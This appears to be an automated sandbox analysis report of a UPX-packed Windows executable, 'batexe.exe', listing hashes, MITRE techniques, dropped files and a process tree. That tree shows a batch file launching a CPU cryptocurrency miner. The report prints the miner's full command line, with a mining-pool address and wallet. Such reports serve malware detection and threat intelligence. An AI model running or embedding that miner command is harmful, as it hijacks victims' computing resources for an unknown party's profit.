73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21-02-2024 04:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1312	b2e.exe
1868	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1868	cpuminer-sse2.exe
1868	cpuminer-sse2.exe
1868	cpuminer-sse2.exe
1868	cpuminer-sse2.exe
1868	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2212-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2212 wrote to memory of 1312	2212	batexe.exe	81
PID 2212 wrote to memory of 1312	2212	batexe.exe	81
PID 2212 wrote to memory of 1312	2212	batexe.exe	81
PID 1312 wrote to memory of 1012	1312	b2e.exe	82
PID 1312 wrote to memory of 1012	1312	b2e.exe	82
PID 1312 wrote to memory of 1012	1312	b2e.exe	82
PID 1012 wrote to memory of 1868	1012	cmd.exe	85
PID 1012 wrote to memory of 1868	1012	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2212
- C:\Users\Admin\AppData\Local\Temp\F388.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\F388.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\F388.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF9D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1012
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F388.tmp\b2e.exe

Filesize
591KB

MD5
33b005a9c394d656d84b85a460bb5d88

SHA1
2fafd0b241560328b868cba599bcfb8665961db9

SHA256
cb195c716158bee7ac24967d1b019938541a8a50066a85965122103b9bd121c8

SHA512
467bf0c8e31422d06861ae57f76ee73ec66a75a8aca366937d954d931a0f24686e16d830def9e5721655546f6ba8490276f34768a278a6bcf69326bd44eab7fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\F388.tmp\b2e.exe

Filesize
1.1MB

MD5
fa98eaa3a661329af81abc9ce4528de3

SHA1
efd308d72e843fb424d1e026d9ea6561bdaa136a

SHA256
f0c31f10cc405c7048d524ad3ef9391877db7998b25fef5b462e6078cf167248

SHA512
34d9f40016c66cc79eb1c532d063b3b63d171d6918261dfc85a3f3d95c46163214c187a4adf9119b93768f8cd0cc82d880af3830dd57699928eb33dec90c42df

Download Submit
C:\Users\Admin\AppData\Local\Temp\F388.tmp\b2e.exe

Filesize
1.2MB

MD5
0e88d1220c07bc7c252fb1f573bd86da

SHA1
15a414d3b4858e4c0c26985e54b84465296ca31e

SHA256
addf086e120bbd80cd77e2b733d2b881986a0977fa99398e60a0df0a273ca8d5

SHA512
1ca0617cf0d972c74ff2ea5932983f54a897bae31fe49b4a13dd25e233dd4b533d0e0f3da6b4b71f728d765cde226c44a8cfe728618b2d4227dc5e56dc021fd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\FF9D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
432KB

MD5
a8aa8350e8ea1a9a106b84d8b277de41

SHA1
ae9263a28d052eb9cf0ba6c1b92063edee7f86f8

SHA256
c3cfc7c822f270ecbb9d279125e8f42245fc3cfa5726ce4da7847cfbf69617a0

SHA512
157cef54fd5619a2612754f0b1b382d75f5ee6b67c3323be355e86a460f82d1a5196ee76ce277d228f88fb6099b43393f1d8bc182405724fdc0219d566c9176c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
477KB

MD5
161a4c8778d6b80bea94f347a44bc64c

SHA1
1ca8e6cd92bc6ce33ba16363d91b07e062e69ced

SHA256
0d029ffeaf7ac88772a52881ff99e62337f86fc036edc96d4fe547114af2d664

SHA512
e2acc74d61069f6856b20199297a89f2006078e97375906a7bea44f852bfe09bf2eb0236789f8fb602fb2864b413b210e1681ecd12d42a17e46d60971d52087c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
438KB

MD5
b98224838eb05b8b1b0514d60524b214

SHA1
40938cec51f0df741a3363a26fa0058a24e9d6e2

SHA256
9317a6e09f61d1715ff21d3c5ea44fbd2f7d7ebc1a3da18161b5931f404028b1

SHA512
9a9b6019e516208dc9043f7223b766bbbd5416b087c5383589481875fa849ef0eb76f33aed9f06510d7d210a418ad463e62c8a2036cdf59dcdcf5d527a256aed

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
495KB

MD5
78d030dd3c87268457c64fe28d6cf3c1

SHA1
21640a51e2324f336eafef330cbbfd53936238c8

SHA256
fef9b95cf07b0a660c434700baa6f6a3de11064cc43702cd05a5959a87f5a256

SHA512
da007b9863738afd030daf932c606a4f3042d26a4e953566696b580cfae2e31c719e99f1bfe3e3619ef63ee7f365069f7e973b1bcbaa2d88de81ffe1fba1f8c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
256KB

MD5
8b948ddf236dc90462bf042ee9444bc6

SHA1
1b191e2b0816ccab13cc7035acfa8ed92904ded7

SHA256
2bc9dc3b7e116e1b65206d4f3c5603206d8bf605ce2472b55820c9e19c535aed

SHA512
7f3791b32c685f5a4b16f1f37acdc96d5339e217d083687ecc46eb0a2f4559a00ab710b7bad2236bf5ac08d0daf4c007f3f941c370e0c81b60260cb06877b338

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
358KB

MD5
0e37a6eae6b6c3455b7b7d7b804d0f3c

SHA1
66f028667a41087791454ad8a961bda217f045cc

SHA256
fa8da3cfb4a13e707408edf339ef96f72d22c0ed3b78fc50d8f148641b89930d

SHA512
4180dedeff071bbf92381190d568d2a299196b169d5a52c942afca79732d7b3be1d06cc67cc5d0055e3055b81d7157b2831547736e51df283effd1ea9002e4a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
378KB

MD5
0dbae21a97255b664579a993f91aab5a

SHA1
68d9a4cbf5cf306458758d7b118a109574d0ead8

SHA256
52edffc26f98b2540c401eea611801e0d5c9ebb8a507cdf82a9a3192616d1877

SHA512
c0f60125ddae4952ec4a3fb6530493a515b7c6111abb546fb376d2ad236f7a3714a5c0e5baa7dec782c7977d0976636ba7f83c118a7e0ccf2d90f153315d891c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
149KB

MD5
31325ee097b2686dd3f7ed3c46dca632

SHA1
b0f57a72c2b5d73f2a3b64937f3c442d4c1892b0

SHA256
a8695fed44df7301297f77490b02ecb540f18663e0023f9bbe956e9ab1adada8

SHA512
0b6b4ebd9c5437aee23455b1aa41814b413a9f8fb6257ddb7984254aa0c2fe6b50bc8829eed15295bce4b0c7476732a8f2f660cb72587f639c29bc63b8cc64f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
555KB

MD5
bfabd5fb2d2d8981610bc29ebfc2ab91

SHA1
9ba790f930774a111df4e69a08ee60e3eea84185

SHA256
4f2cc169c2874add8d7bb198944eb12736d0c87ded0797b14d2275c9e78e6078

SHA512
38c1108ceba377f6c8a35c036151b616f7355e9bc8dabebe2c6480a356fcee6a0111881c455419dd441d83e8c217f99ff2df4350bf19e2f37238804e86ff146b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
430KB

MD5
fc8f6b72e62bd3854d36f36d87cffe54

SHA1
eb89621192ef90dd7f46dbeee2946ebb8753b861

SHA256
150aeb1fe0053788c9375cab8b974789330a8eb25761b445a6dd24e41d993c78

SHA512
3aa91d03ccb05ed7b2ef0e1122a34d979b0e65c942c8c796276c51dd454145ec03b053d476ae9dc9ad0bf59ff655794dd65c79b44482ab8121fb3a92ae412a09

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
225KB

MD5
8646aab87a047b39dd956e2e0f0e4ada

SHA1
534810dcab82131b49d49bd007323f5c4a4fb998

SHA256
7166ae6a5d4fc18db194ac4d12570efa9eeefa7808ca3031a292cc3dcd745ddd

SHA512
dd419b3b5fe462c17aac6a70cc0b2316a1c9a19c38472206d0b8a62d5fa4a5f1117eac237a4cbe1b36a20104ec8b0171e6744a987b0e43612f2461245627e38d

Download Submit
memory/1312-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1312-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1868-46-0x00000000635D0000-0x0000000063668000-memory.dmp

Filesize
608KB

Download
memory/1868-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1868-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1868-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1868-47-0x0000000001140000-0x00000000029F5000-memory.dmp

Filesize
24.7MB

Download
memory/1868-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1868-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1868-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1868-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1868-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1868-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1868-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2212-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download